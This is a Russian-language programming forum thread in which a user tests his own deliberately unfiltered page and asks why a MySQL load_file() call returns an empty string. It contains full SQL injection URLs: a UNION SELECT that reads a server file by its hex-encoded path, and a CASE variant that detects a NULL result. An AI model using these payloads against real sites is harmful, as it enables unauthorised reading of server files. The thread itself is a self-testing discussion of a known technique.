Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Программная инженерия > Безопасность, Шифрование
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 09.12.2015, 06:19   #1
pompiduskus
юзер как все
Участник клуба
 
Аватар для pompiduskus
 
Регистрация: 10.01.2012
Сообщений: 1,586
По умолчанию почему load_file() возвращает пустую строку "" ?

Добрый день.

Я у себя на сайте создал страницу на которой вообще не фильтруются данные от юзера, и пытаюсь выполнить это:

mysql::5.6.25-73.1

Код:
pompiduskus2.0fees.us/db_test.php?id=-32+union+all+select+1,version(),load_file(concat('0x',hex('/home/vol11_7/0fees.us/0fe_16804936/htdocs/file')))--
Запрос успешно выполняется, но содержимое файла не выдается.

Что странно, сервара sql / web находятся в разных местах и стало быть фидеть содержимое другого сервера они не могут (или могут ?).
Но в тоже время и ошибки тоже нету о том что такого файла нету (NULL не выводит).

Может быть такое что в новых версиях встроен некий механизм фильтрации ?
<Дзен - Вся вселенная в тебе > | Резюме: https://ch3ll0v3k.github.io/CV/
pompiduskus вне форума Ответить с цитированием
Старый 09.12.2015, 10:16   #2
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,097
По умолчанию

Дыры латаешь?
А с чего ты взял, что доступ к файлу есть?
I'm learning to live...
Stilet вне форума Ответить с цитированием
Старый 09.12.2015, 16:14   #3
pompiduskus
юзер как все
Участник клуба
 
Аватар для pompiduskus
 
Регистрация: 10.01.2012
Сообщений: 1,586
По умолчанию

Можно сказать и так.
Но он же должен хотя бы NULL выдать даже если нет прав FILE? или это не обязательно ?
<Дзен - Вся вселенная в тебе > | Резюме: https://ch3ll0v3k.github.io/CV/
pompiduskus вне форума Ответить с цитированием
Старый 09.12.2015, 16:17   #4
Пепел Феникса
Старожил
 
Аватар для Пепел Феникса
 
Регистрация: 28.01.2009
Сообщений: 21,000
По умолчанию

а может это скрипт так выдает что NULL и пустая строка это одно и тоже?
Хорошо поставленный вопрос это уже половина ответа. | Каков вопрос, таков ответ.
Программа делает то что написал программист, а не то что он хотел.
Функции/утилиты ждут в параметрах то что им надо, а не то что вы хотите.
Пепел Феникса вне форума Ответить с цитированием
Старый 09.12.2015, 16:21   #5
pompiduskus
юзер как все
Участник клуба
 
Аватар для pompiduskus
 
Регистрация: 10.01.2012
Сообщений: 1,586
По умолчанию

Точно, наврное так и есть. Как я сам не додумался
<Дзен - Вся вселенная в тебе > | Резюме: https://ch3ll0v3k.github.io/CV/
pompiduskus вне форума Ответить с цитированием
Старый 09.12.2015, 16:38   #6
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,097
По умолчанию

Ага. Кажется это можно проверить через case.
Код:
case load_file(...) is NULL then "Ашыпка" else load_file(...) end
I'm learning to live...
Stilet вне форума Ответить с цитированием
Старый 09.12.2015, 17:46   #7
pompiduskus
юзер как все
Участник клуба
 
Аватар для pompiduskus
 
Регистрация: 10.01.2012
Сообщений: 1,586
По умолчанию

Да, точно. Так и выходит если использовать CASE. То точно выдает отрицательный результат
Код:
pompiduskus2.0fees.us/db_test.php?id=-32+union+all+select+1,2,case+when+load_file(concat('0x',hex('/home/vol11_7/0fees.us/0fe_16804936/htdocs/file')))+is+NULL+then+"File_is_NULL"+else+load_file(concat('0x',hex('/home/vol11_7/0fees.us/0fe_16804936/htdocs/file')))+end--
<Дзен - Вся вселенная в тебе > | Резюме: https://ch3ll0v3k.github.io/CV/
pompiduskus вне форума Ответить с цитированием
Старый 09.12.2015, 19:42   #8
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,097
По умолчанию

Цитата:
pompiduskus2.0fees.us
Попал ты, парень ))
Ща тебя какеры всякие ломать будут
Ну погоди, заяц ))))
I'm learning to live...
Stilet вне форума Ответить с цитированием
Старый 09.12.2015, 23:46   #9
pompiduskus
юзер как все
Участник клуба
 
Аватар для pompiduskus
 
Регистрация: 10.01.2012
Сообщений: 1,586
По умолчанию

=) Это те Которые КулХаЦкеры =))) Если они то Все пропало!
<Дзен - Вся вселенная в тебе > | Резюме: https://ch3ll0v3k.github.io/CV/
pompiduskus вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вывести на экран дисплея в одну строку все литеры между "A" и "Z", включая эти буквы. shewlett Помощь студентам 3 24.02.2015 20:48
Функция возвращает пустую строку Chikoy Общие вопросы Delphi 6 18.05.2012 07:18
mysql_query("select * ...) возвращает пустую таблицу dutch92 PHP 2 16.03.2011 08:36
Запрос возвращает пустую таблицу, если один из подзаросов возвращает пустую таблицу ArtInt SQL, базы данных 9 12.05.2010 15:40
если поле Patr пусто или null то пустую строку возвращает azat БД в Delphi 5 01.02.2008 13:05